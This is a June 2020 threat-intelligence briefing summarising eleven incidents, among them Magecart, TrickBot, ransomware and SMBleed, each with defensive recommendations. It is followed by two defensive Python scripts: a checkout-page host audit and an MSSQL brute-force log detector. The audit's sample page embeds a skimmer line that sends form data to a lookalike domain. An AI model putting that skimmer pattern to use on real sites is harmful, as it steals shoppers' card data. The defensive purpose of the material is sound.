June 16, 2020 - Anomali Threat Research

Weekly Threat Briefing: APT Group, Microsoft Vulnerabilities, Ransomware, Spyware, and More

<div id="weekly"><p id="intro">The various threat intelligence stories in this iteration of the Weekly Threat Briefing discuss the following topics:<b> ActionSpy, APT, Data breach, Magecart, Ransomware, </b> and <b> Vulnerabilities</b>. The IOCs related to these stories are attached to the Weekly Threat Briefing and can be used to check your logs for potential malicious activity. <img src="https://cdn.filestackcontent.com/p2732wmGQm69bCbfv5Ur"/><br/> <b>Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.</b></p><div id="trending-threats"><h2 id="trendingthreats">Trending Cyber News and Threat Intelligence</h2><h3 id="article-1" style="margin-bottom:0;"><a href="https://sansec.io/research/magecart-corona-lockdown" target="_blank"><b>Magecart Strikes Amid Corona Lockdown</b></a></h3><p>(published: June 15, 2020)</p><p>Security researchers at Sansec have identified how the retail chain Claire’s Accessories had customer card data stolen. The day after Claire’s announced it would close all stores in response to the COVID-19 pandemic, the domain “claires-assets.com” was registered. During the last week of April, the online stores of Claire’s and its sister company, Icing, had malicious code injected into them that exfiltrated customer information to the above-mentioned server. Having gained write access to the store through unknown means, the threat actors attached the malicious code to the submit button of the checkout form. By appending the stolen data to an image address, the threat actors receive the payload and may have a higher chance of going undetected, since not all image requests are monitored by security software.<br/> <b>Recommendation:</b> While it is not known how the threat actor gained access, it may have been through spearphishing or stolen credentials. As a result, all employees should be educated on the risks of spearphishing and how to identify such attempts. 
Employees should also use different passwords for business-related accounts, because actors will often test other accounts with previously stolen passwords. In addition, it is crucial that business accounts use a form of two-factor or multi-factor authentication to make it difficult for actors to compromise accounts.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947180">[MITRE ATT&amp;CK] Spearphishing Attachment - T1193</a> | <a href="https://ui.threatstream.com/ttp/947106">[MITRE ATT&amp;CK] Spearphishing Link - T1192</a> | <a href="https://ui.threatstream.com/ttp/947231">[MITRE ATT&amp;CK] Valid Accounts - T1078</a> | <a href="https://ui.threatstream.com/ttp/947235">[MITRE ATT&amp;CK] Obfuscated Files or Information - T1027</a> | <a href="https://ui.threatstream.com/ttp/947133">[MITRE ATT&amp;CK] Custom Cryptographic Protocol - T1024</a><br/> <b>Tags:</b> Claires, COVID, Javascript, Magecart, Skimmer</p><h3 id="article-2" style="margin-bottom:0;"><a href="https://www.zdnet.com/article/knoxville-shuts-down-it-network-following-ransomware-attack/" target="_blank"><b>Knoxville Shuts Down IT Network Following Ransomware Attack</b></a></h3><p>(published: June 11, 2020)</p><p>The city of Knoxville, Tennessee, has been the victim of a ransomware attack. Occurring on June 10 or 11, the attack was not noticed by the city until multiple systems had been encrypted by the ransomware. In response, the city disconnected the network from the internet, and the city court system was taken offline. The ransomware used in this attack is unknown, as is how it spread; the FBI is currently investigating.<br/> <b>Recommendation:</b> Ransomware is a continually evolving threat. It is paramount to have a comprehensive and tested backup solution in place, in addition to a business continuity policy. 
In the unfortunate case that a restorable backup is not in place, make sure to check for a decryptor before considering payment; avoid payment at all costs. Ransomware should be reported to law enforcement agencies, who are doing their best to track these actors and prevent ransom from being a profitable business for threat actors.<br/> <b>Tags:</b> Ransomware, Knoxville, Data Encrypted for Impact</p><h3 id="article-3" style="margin-bottom:0;"><a href="https://blog.trendmicro.com/trendlabs-security-intelligence/new-android-spyware-actionspy-revealed-via-phishing-attacks-from-earth-empusa/" target="_blank"><b>New Android Spyware ActionSpy Revealed via Phishing Attacks from Earth Empusa</b></a></h3><p>(published: June 11, 2020)</p><p>Trend Micro researchers have identified an Android malware targeting users in Tibet, Turkey, Taiwan, and Xinjiang. The malware, named “ActionSpy”, is spyware that steals information from the device and is used by the threat group Earth Empusa, which targets the Uyghur minority in China. Earth Empusa uses phishing sites to invite users to download a Uyghur video application, Ekran, that instead installs the ActionSpy malware. Imitating the Ekran app, the malware requests the accessibility service permission, which enables chat logs to be stolen from other applications such as WeChat. The spyware can collect location data, call logs, and SMS messages, take photos, and record audio, among other capabilities.<br/> <b>Recommendation:</b> Android users are advised to avoid third-party downloads and instead download from trusted sources such as the Google Play store. 
Always keep your device fully patched with the latest security updates.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947267">[MITRE ATT&amp;CK] Drive-by Compromise - T1189</a> | <a href="https://ui.threatstream.com/ttp/947235">[MITRE ATT&amp;CK] Obfuscated Files or Information - T1027</a> | <a href="https://ui.threatstream.com/ttp/947195">[MITRE ATT&amp;CK] File and Directory Discovery - T1083</a> | <a href="https://ui.threatstream.com/ttp/947207">[MITRE ATT&amp;CK] Process Discovery - T1057</a> | <a href="https://ui.threatstream.com/ttp/947125">[MITRE ATT&amp;CK] System Information Discovery - T1082</a> | <a href="https://ui.threatstream.com/ttp/947187">[MITRE ATT&amp;CK] System Network Configuration Discovery - T1016</a> | <a href="https://ui.threatstream.com/ttp/947200">[MITRE ATT&amp;CK] System Network Connections Discovery - T1049</a> | <a href="https://ui.threatstream.com/ttp/947093">[MITRE ATT&amp;CK] Audio Capture - T1123</a> | <a href="https://ui.threatstream.com/ttp/947135">[MITRE ATT&amp;CK] Data from Local System - T1005</a> | <a href="https://ui.threatstream.com/ttp/947079">[MITRE ATT&amp;CK] Screen Capture - T1113</a> | <a href="https://ui.threatstream.com/ttp/947184">[MITRE ATT&amp;CK] Video Capture - T1125</a> | <a href="https://ui.threatstream.com/ttp/947266">[MITRE ATT&amp;CK] Data Encrypted - T1022</a> | <a href="https://ui.threatstream.com/ttp/947291">[MITRE ATT&amp;CK] Commonly Used Port - T1043</a> | <a href="https://ui.threatstream.com/ttp/947126">[MITRE ATT&amp;CK] Standard Application Layer Protocol - T1071</a> | <a href="https://ui.threatstream.com/ttp/947150">[MITRE ATT&amp;CK] Standard Cryptographic Protocol - T1032</a><br/> <b>Tags:</b> ActionSpy, Android, Earth Empusa, Malware, Spyware, Uyghurs</p><h3 id="article-4" style="margin-bottom:0;"><a href="https://www.zdnet.com/article/hackers-breached-a1-telekom-austrias-largest-isp/" target="_blank"><b>Austria’s Largest ISP Admits to Data Breach after 
Expose</b></a></h3><p>(published: June 11, 2020)</p><p>This week a whistle-blower forced A1 Telekom, the largest Internet Service Provider (ISP) in Austria, to admit that it had suffered a significant security breach following a malware infection in November 2019. While not disclosing the nature of the infection, A1 said that the malware had lain undetected for a month while infecting its office network of approximately 15,000 workstations, 12,000 servers, and thousands more applications. The attacker then allegedly took control of the malware and attempted to run database queries, leading to a 6-month clean-up by the A1 security team to remove backdoors. A1 stated that none of its customer data was compromised. The whistle-blower claims that the attack was carried out by APT 27 (Emissary Panda, Gallium), a Chinese APT known for targeting telecom providers.<br/> <b>Recommendation:</b> Malware authors are always innovating new methods of communicating back to their control servers. Always practice Defense in Depth (do not rely on single security mechanisms; security measures should be layered, redundant, and failsafe).<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947126">[MITRE ATT&amp;CK] Standard Application Layer Protocol - T1071</a><br/> <b>Tags:</b> Telecommunications, data breach, Austria, APT 27, ISP, malware, backdoor</p><h3 id="article-5" style="margin-bottom:0;"><a href="https://www.bleepingcomputer.com/news/security/fake-black-lives-matter-voting-campaign-spreads-trickbot-malware/" target="_blank"><b>Fake Black Lives Matter Voting Campaign Spreads Trickbot Malware</b></a></h3><p>(published: June 10, 2020)</p><p>A spearphishing campaign is leveraging the Black Lives Matter (BLM) movement to distribute the information-stealer malware TrickBot. 
The BLM movement became a focal point worldwide after the death of George Floyd in the U.S., and threat actors are exploiting the tragedy as a lure for their operations. The email asks recipients to vote anonymously about BLM; once they open the attached document, they are asked to enable its content to view it properly. Once content is enabled, an embedded macro downloads the TrickBot trojan DLL onto the target system. TrickBot has the ability to download additional modules to steal Active Directory service databases, cookies, credentials saved in browsers, OpenSSH keys, PuTTY credentials, Remote Desktop Protocol (RDP) credentials, and Virtual Network Computing (VNC) credentials. TrickBot will also download a module for lateral movement through the victim's network to collect data. Threat actors operating TrickBot have also been seen to use several different ransomware payloads in their operations, including Ryuk, to encrypt user drives.<br/> <b>Recommendation:</b> Spearphishing is the most common type of threat facing targeted industries such as NGOs. All members of NGO organizations are susceptible to attack and should be educated on how to prevent phishing attacks. Email attachments should be treated as untrusted regardless of the sender's credibility. Detection and prevention measures should be taken to ensure that users do not fall victim to phishing. In the case of a TrickBot compromise, the entire network should be scanned for infection, and an incident process should commence to identify the initial infection vector as well as the scope of the compromise. 
Sophisticated, targeted attacks should be reported to the respective investigative government authorities.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947135">[MITRE ATT&amp;CK] Data from Local System - T1005</a> | <a href="https://ui.threatstream.com/ttp/947201">[MITRE ATT&amp;CK] Scripting - T1064</a> | <a href="https://ui.threatstream.com/ttp/947180">[MITRE ATT&amp;CK] Spearphishing Attachment - T1193</a> | <a href="https://ui.threatstream.com/ttp/947205">[MITRE ATT&amp;CK] User Execution - T1204</a> | <a href="https://ui.threatstream.com/ttp/947116">[MITRE ATT&amp;CK] Credentials in Registry - T1214</a> | <a href="https://ui.threatstream.com/ttp/2402531">[MITRE ATT&amp;CK] Data Encrypted for Impact - T1486</a> | <a href="https://ui.threatstream.com/ttp/3297571">[MITRE ATT&amp;CK] Credentials from Web Browsers - T1503</a> | <a href="https://ui.threatstream.com/ttp/3297610">[MITRE ATT&amp;CK] Steal Web Session Cookie - T1539</a><br/> <b>Tags:</b> TrickBot, Black Lives Matter, Information-Stealer, Spearphishing</p><h3 id="article-6" style="margin-bottom:0;"><a href="https://threatpost.com/thanos-ransomware-weaponize-riplace-tactic/156438/" target="_blank"><b>Thanos Ransomware First to Weaponize RIPlace Tactic</b></a></h3><p>(published: June 10, 2020)</p><p>The Thanos ransomware-as-a-service (RaaS) tool, increasingly popular on multiple underground forums, is the first ransomware family to use the RIPlace tactic. RIPlace is a Windows file system technique used to maliciously alter files, and it allows attackers to bypass various anti-ransomware methods.<br/> <b>Recommendation:</b> Ransomware can potentially be blocked by using endpoint protection solutions. Always keep your important files backed up. In the case of a ransomware infection, the affected system must be wiped and reformatted. Other devices on the network should be checked for similar infections. 
Always check for a decryptor before considering payment; avoid payment at all costs.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/2402531">[MITRE ATT&amp;CK] Data Encrypted for Impact - T1486</a><br/> <b>Tags:</b> Ransomware, RIPlace</p><h3 id="article-7" style="margin-bottom:0;"><a href="https://citizenlab.ca/2020/06/dark-basin-uncovering-a-massive-hack-for-hire-operation/" target="_blank"><b>Dark Basin: Uncovering a Massive Hack-For-Hire Operation</b></a></h3><p>(published: June 9, 2020)</p><p>Researchers at CitizenLab have released a report on a hacker-for-hire group called Dark Basin. The group has been linked to the Indian company BellTroX InfoTech Services and has been targeting banks, investment firms, corporate law firms, senior politicians, government prosecutors, CEOs, journalists, and human rights defenders. According to CitizenLab, the group would send phishing emails to the target’s personal and professional email accounts. In addition to direct targeting, the group would also target family members of the victim; in at least one case, a target’s minor child was sent phishing emails. After gaining access to the victim’s email account, the group used internal emails to target other users in the organization.<br/> <b>Recommendation:</b> Defense-in-depth is the best way to ensure safety from APTs. Defense-in-depth involves the layering of defense mechanisms. 
This can include network and endpoint security, social engineering training for staff (such as training exercises to help detect phishing emails), and robust threat intelligence capabilities.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947106">[MITRE ATT&amp;CK] Spearphishing Link - T1192</a> | <a href="https://ui.threatstream.com/ttp/947263">[MITRE ATT&amp;CK] Spearphishing via Service - T1194</a><br/> <b>Tags:</b> APT, espionage, Spearphishing</p><h3 id="article-8" style="margin-bottom:0;"><a href="https://blog.malwarebytes.com/threat-analysis/2020/06/honda-and-enel-impacted-by-cyber-attack-suspected-to-be-ransomware/" target="_blank"><b>Honda and Enel Impacted By Cyber Attack Suspected To Be Ransomware</b></a></h3><p>(published: June 9, 2020)</p><p>On 8 June 2020, security researcher Vitali Kremez reported that two new samples of the Ekans ransomware had been uploaded to VirusTotal. Based on strings inside the malware samples, it was suspected that Honda Motor Company, Ltd and a subsidiary of Enel Group were the victims. This was later confirmed by Honda and by Edesur, the affected subsidiary of Enel Group. The malware was first reported publicly in January 2020 and has been used by the threat actor since mid-December 2019. What sets this ransomware apart from other strains is that it is being used to target manufacturers and ICS companies.<br/> <b>Recommendation:</b> Ransomware can potentially be blocked by using endpoint protection solutions. Always keep your important files backed up. In the case of a ransomware infection, the affected system must be wiped and reformatted. Other devices on the network should be checked for similar infections. Always check for a decryptor before considering payment; avoid payment at all costs. 
Ransomware should be reported to law enforcement agencies, who are doing their best to track these actors and prevent ransom from being a profitable business for cyber criminals.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/2402531">[MITRE ATT&amp;CK] Data Encrypted for Impact - T1486</a><br/> <b>Tags:</b> ekans, snake, ransomware</p><h3 id="article-9" style="margin-bottom:0;"><a href="https://thehackernews.com/2020/06/SMBleed-smb-vulnerability.html" target="_blank"><b>SMBleed: A New Critical Vulnerability Affects Windows SMB Protocol</b></a></h3><p>(published: June 9, 2020)</p><p>Security researchers at ZecOps have discovered a new and critical vulnerability that affects the Server Message Block (SMB) protocol. This flaw could allow attackers to leak kernel memory remotely, and the exploit can be chained with a previous vulnerability, SMBGhost, to achieve remote code execution. The SMBleed vulnerability resides in SMB’s decompression function in the srv2.sys server driver. According to Microsoft, successful exploitation of this vulnerability requires a connection from the user to an attacker-owned malicious SMB v3 server. SMBleed affects Windows 10 versions 1903, 1909, and 2004 before KB4557957; patches for SMBleed were made available as part of the June 2020 Patch Tuesday by Microsoft.<br/> <b>Recommendation:</b> Ensure endpoints are secure with updated patches; also make sure users have only standard user accounts and not privileged ones, and use endpoint antimalware tools to protect the devices. These steps should be complemented, in a defense-in-depth approach, by scanning network connections and email for malware. 
This will help reduce the chance that the malware will be able to get on the endpoint and execute.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947217">[MITRE ATT&amp;CK] Exploitation of Remote Services - T1210</a><br/> <b>Tags:</b> Exploit, SMB, Wormable, CVE-2020-0796, SMBleed</p><h3 id="article-10" style="margin-bottom:0;"><a href="https://news.sophos.com/en-us/2020/06/09/kingminer-report/" target="_blank"><b>Kingminer Escalates Attack Complexity For Cryptomining</b></a></h3><p>(published: June 9, 2020)</p><p>Researchers from Sophos have released a report on a new variant of the KingMiner malware that targets Microsoft SQL servers. KingMiner was originally discovered by Check Point in November 2018. The report discusses recent changes in the tactics, techniques, and procedures used by the threat group. The attackers use brute-force techniques to gain initial access to the MSSQL server and install the XMRig cryptocurrency mining software. The group has evolved over time, adding features such as a Domain Generation Algorithm (DGA) for payload delivery, the exploits CVE-2017-0213 or CVE-2019-0803 for privilege escalation attempts, and DLL sideloading. The group prefers to use customized versions of popular open-source tools such as PowerSploit and Mimikatz in its operations.<br/> <b>Recommendation:</b> Limit the exposure of MSSQL servers to the internet unless it is business critical, and monitor logon activity for suspicious login attempts. Security updates for all software used by your company should be properly reviewed and applied as soon as possible to assist in avoiding potential malicious activity. 
Cryptocurrency miners cause high CPU usage; therefore, if the fans on a machine seem to be always running, the activity/task manager should be checked for suspicious software, potentially miners, running without the user's knowledge.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947227">[MITRE ATT&amp;CK] Brute Force - T1110</a> | <a href="https://ui.threatstream.com/ttp/947232">[MITRE ATT&amp;CK] DLL Side-Loading - T1073</a> | <a href="https://ui.threatstream.com/ttp/2402536">[MITRE ATT&amp;CK] Domain Generation Algorithms - T1483</a> | <a href="https://ui.threatstream.com/ttp/947201">[MITRE ATT&amp;CK] Scripting - T1064</a><br/> <b>Tags:</b> Kingminer, Cryptominer, SQL, Privilege Escalation, DLL side loading, Botnet, Brute Force</p><h3 id="article-11" style="margin-bottom:0;"><a href="https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/2020-Jun" target="_blank"><b>Microsoft Releases June 2020 Security Patches For 129 Vulnerabilities</b></a></h3><p>(published: June 9, 2020)</p><p>Microsoft has released updates to address multiple vulnerabilities in Microsoft products and software. An attacker could exploit some of these vulnerabilities to take control of an affected system. 
Affected software includes Microsoft Windows, Microsoft Edge (EdgeHTML-based), Microsoft Edge (Chromium-based) in IE Mode, Microsoft ChakraCore, Internet Explorer, Microsoft Office, Microsoft Office Services and Web Apps, Windows Defender, Microsoft Dynamics, Visual Studio, Azure DevOps, HoloLens, Adobe Flash Player, Microsoft Apps for Android, Windows App Store, System Center, and Android App.<br/> <b>Recommendation:</b> Apply patches KB 4560960, 4561608, 4561616, 4561643, 4561645, 4561669, 4561670 and make sure all affected software is up to date.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947217">[MITRE ATT&amp;CK] Exploitation of Remote Services - T1210</a><br/> <b>Tags:</b> CVE-2020-1148, CVE-2020-1160, CVE-2020-1163, CVE-2020-1170, CVE-2020-1177, CVE-2020-1178, CVE-2020-1181, CVE-2020-1183, CVE-2020-1206, CVE-2020-1217, CVE-2020-1220, CVE-2020-1223, CVE-2020-1225, CVE-2020-1226, CVE-2020-1229, CVE-2020-1232, CVE-2020-1242, CVE-2020-1261, CVE-2020-1263, CVE-2020-1268, CVE-2020-1284, CVE-2020-1289, CVE-2020-1290, CVE-2020-1295, CVE-2020-1296, CVE-2020-1297, CVE-2020-1298, CVE-2020-1315, CVE-2020-1301, CVE-2020-1318, CVE-2020-1320, CVE-2020-1321, CVE-2020-1322, CVE-2020-1323, CVE-2020-1329, Vulnerability, Patch Tuesday</p></div></div>
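The Magecart story above (article 1) describes a skimmer attached to the checkout form that ships card data as a parameter on an image address hosted on a brand-lookalike domain. One control a merchant can run against every release of the checkout page is an integrity audit of the hosts the page references. The script below is an added example written for this briefing, not Sansec's tooling or anything from Claire's: it extracts every absolute or protocol-relative URL from the page source (including quoted strings inside inline scripts, where such handlers are typically built), drops hosts on the merchant's allowlist, and flags the remainder, marking hosts that embed the brand name for priority review. The sample page, the brand name "example-shop" and the allowlist are constructed.

```python
"""Defensive integrity check for a checkout page: list every external host the
page's HTML/JS references and flag any host not on the merchant's allowlist,
marking brand-lookalike hosts. Added example; page, brand and allowlist are constructed."""
import re
from urllib.parse import urlparse

# Absolute and protocol-relative URLs. A heuristic: it also catches quoted
# strings inside inline scripts, which is where skimmers build their exfil address.
URL_RE = re.compile(r"""(?:https?:)?//[A-Za-z0-9.\-]+(?::\d+)?(?:/[^\s"'<>)]*)?""")

# Constructed checkout page: two legitimate third parties plus an injected
# submit handler that appends form data to an image address on a lookalike domain.
SAMPLE_CHECKOUT_PAGE = """
<script src="https://example-shop.com/js/checkout.js"></script>
<script src="https://cdn.example-payments.com/v2/pay.js"></script>
<img src="https://static.example-shop.com/img/cart.png">
<script>
document.querySelector('#submit').addEventListener('click', function () {
  new Image().src = '//example-shop-assets.com/i.png?d=' + btoa(JSON.stringify(form));
});
</script>
"""


def normalize(name):
    """Lower-case and strip separators so 'example-shop' and 'exampleshop' compare equal."""
    return re.sub(r"[.\-]", "", name.lower())


def extract_hosts(page_source):
    """Return the set of hostnames referenced anywhere in the page source."""
    hosts = set()
    for match in URL_RE.finditer(page_source):
        url = match.group(0)
        if url.startswith("//"):
            url = "https:" + url  # urlparse needs a scheme to expose the host
        host = urlparse(url).hostname
        if host:
            hosts.add(host.lower())
    return hosts


def is_trusted(host, trusted_hosts):
    """A host is trusted if it equals an allowlisted domain or is a subdomain of one."""
    return any(host == t or host.endswith("." + t) for t in trusted_hosts)


def is_brand_lookalike(host, brand):
    """True when the brand name appears inside a host that is not the brand's own."""
    return normalize(brand) in normalize(host)


def audit_page_hosts(page_source, brand, trusted_hosts):
    """Return the untrusted hosts on the page, sorted by name, each with a lookalike flag."""
    findings = []
    for host in sorted(extract_hosts(page_source)):
        if is_trusted(host, trusted_hosts):
            continue
        findings.append({"host": host, "brand_lookalike": is_brand_lookalike(host, brand)})
    return findings


if __name__ == "__main__":
    for finding in audit_page_hosts(SAMPLE_CHECKOUT_PAGE, "example-shop",
                                    ["example-shop.com", "example-payments.com"]):
        print(finding)
```

Run against the constructed page, the audit returns only the injected lookalike host. The allowlist check is subdomain-aware, so a CDN such as cdn.example-payments.com passes without being listed individually; a host that is neither allowlisted nor a lookalike is still reported, just without the flag, because any new third party on a payment page deserves a look.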
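The KingMiner story above (article 10) reports initial access by brute-forcing MSSQL logins and recommends monitoring logon activity. SQL Server records each failed login in its ERRORLOG as error 18456 with the login name and the client address, which is enough to spot password guessing without any extra tooling. The script below is an added example for this briefing, not Sophos's or Check Point's code: it parses failed-login lines, groups them by client address, and raises an alert when one address accumulates a threshold of failures inside a sliding time window. The ERRORLOG excerpt, addresses and login names are constructed; the threshold and window are assumptions to tune per environment.

```python
"""Brute-force detection over SQL Server ERRORLOG lines: group 'Login failed'
events (error 18456) by client address and alert when a client reaches a
threshold of failures inside a sliding window. Added example; the log is constructed."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# ERRORLOG failed-login line:
# "<timestamp> Logon  Login failed for user '<name>'. Reason: ... [CLIENT: <address>]"
FAILED_LOGIN_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+)\s+Logon\s+"
    r"Login failed for user '(?P<user>[^']*)'.*\[CLIENT: (?P<client>[^\]]+)\]"
)

# Constructed excerpt: six failures from one address within eight seconds
# (guessing against 'sa' and a non-existent 'admin'), one isolated failure
# from another address, and unrelated lines the parser must ignore.
SAMPLE_ERRORLOG = """\
2020-06-09 10:15:01.23 Logon       Error: 18456, Severity: 14, State: 8.
2020-06-09 10:15:01.23 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]
2020-06-09 10:15:03.10 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]
2020-06-09 10:15:04.88 Logon       Login failed for user 'admin'. Reason: Could not find a login matching the name provided. [CLIENT: 203.0.113.5]
2020-06-09 10:15:06.02 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]
2020-06-09 10:15:07.41 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]
2020-06-09 10:15:09.77 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]
2020-06-09 10:21:30.00 Logon       Login failed for user 'appuser'. Reason: Password did not match that for the login provided. [CLIENT: 198.51.100.7]
2020-06-09 10:22:00.00 spid52      Starting up database 'tempdb'.
"""


def parse_failed_logins(lines):
    """Return a list of (timestamp, client, user) for every failed-login line; others are skipped."""
    events = []
    for line in lines:
        match = FAILED_LOGIN_RE.match(line.strip())
        if match:
            ts = datetime.strptime(match["ts"], "%Y-%m-%d %H:%M:%S.%f")
            events.append((ts, match["client"], match["user"]))
    return events


def detect_bruteforce(lines, threshold=5, window=timedelta(minutes=1)):
    """Return {client: summary} for clients whose failures within any `window` reach `threshold`."""
    by_client = defaultdict(list)
    for ts, client, user in parse_failed_logins(lines):
        by_client[client].append((ts, user))
    alerts = {}
    for client, attempts in by_client.items():
        attempts.sort()
        peak, start = 0, 0
        # Two-pointer sliding window over the time-sorted attempts: advance the
        # start while the span exceeds the window, and track the densest run.
        for end in range(len(attempts)):
            while attempts[end][0] - attempts[start][0] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts[client] = {
                "peak_failures_in_window": peak,
                "total_failures": len(attempts),
                "users": sorted({user for _, user in attempts}),
            }
    return alerts


if __name__ == "__main__":
    for client, summary in detect_bruteforce(SAMPLE_ERRORLOG.splitlines()).items():
        print(client, summary)
```

On the constructed log only 203.0.113.5 is reported, with six failures in the window and both guessed login names listed; the single failure from 198.51.100.7 stays below the threshold. The sliding window matters because a slow guesser spreads attempts over hours, so the alert should key on density within a window rather than a raw total, and the set of login names per client is a quick tell for enumeration rather than a user mistyping one password.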
